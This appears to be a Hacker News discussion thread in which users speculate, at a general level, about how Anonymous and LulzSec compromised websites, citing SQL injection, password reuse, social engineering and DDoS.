

Ask HN: How do Anonymous and Lulz hack so many sites? - jason_slack

I'd like to ask how does Anonymous and Lulz gain access to so many systems? Obviously this could be due to unpatched systems, weak passwords, poor security, etc but are they really doing anything advanced to gain access?<p>I have to wonder with proper security practice would as many of these hacks occur?<p>Are these places running proper firewalling?<p>Are they running vulnerable services like SSH on an obscure port?<p>Are their database servers more exposed than they should be?<p>Are they using horrible passwords?<p>Do they not review logs?<p>Get what I am asking? I mean for even my home internet circuit I run a dedicated firewall, dont run ssh on 22, deny everything except what I need.<p>Can anyone provide any thoughts?
======
gee_totes
All of the above, and more. For example, in the HBGary hack, they used a
combination of SQL injection to expose passwords, got lucky when some of these
passwords could be re-used for SSH access, then had to resort to good ol'
social engineering for full control of the system. This article provides some
good insights:

[http://arstechnica.com/tech-policy/news/2011/02/anonymous-
sp...](http://arstechnica.com/tech-policy/news/2011/02/anonymous-speaks-the-
inside-story-of-the-hbgary-hack.ars/1)

There is no magic bullet to stop these types of hackers. It's important that
you practice good security culture, since some of these guys do use very
advanced techniques.

Your home internet security could be defeated by a cunning hacker with a
multimeter claiming he/she is there from Comcast to 'upgrade' your router.

~~~
devs1010
Yes, this exactly, I think this was just on Reddit the other day as I remember
reading about this

------
daniellockard
From what I know of Anon and Lulzsec a lot of what they do isn't actually
'hacking.' The sheer amount of boxes they have lets them DDOS any site pretty
easily. If not DDOS they usually do SQL injections.

------
devs1010
Honestly, the question I'm more interested in is how they hide their tracks.
From my knowledge, this can be done with a lot of "geographical" effort by
going to public locations that are random and far enough from a person's
normal routine, and using hardware that can't be traced to you but I wonder if
they actually do this or if they normally do their activities from the comfort
of their home.

------
Andrenid
Most of what I've seen has been via SQL injections in badly coded sites.

------
shrimp
most intrusions these days seem to start with a vulnerable web app, then
passwords for that are tried on db's, ssh, etc

good luck, flamoot

------
hashdb
they are a group of very educated hackers with alot of time to gdb widely used
applications running suid root. They do not publish their remote exploit
Intel... aka blackhats, and their ambitious. That in itself with motives to
prove a point is dangerous, these guys are not careless, very organized and
strike all at once.

------
hashdb
doubt doj and government sites ignore SQL issues, I could be wrong but I'd
find that odd

------
pcvarmint
Some attacks are by government agents claiming to be "Anonymous" in order to
justify passing draconian laws like SOPA.

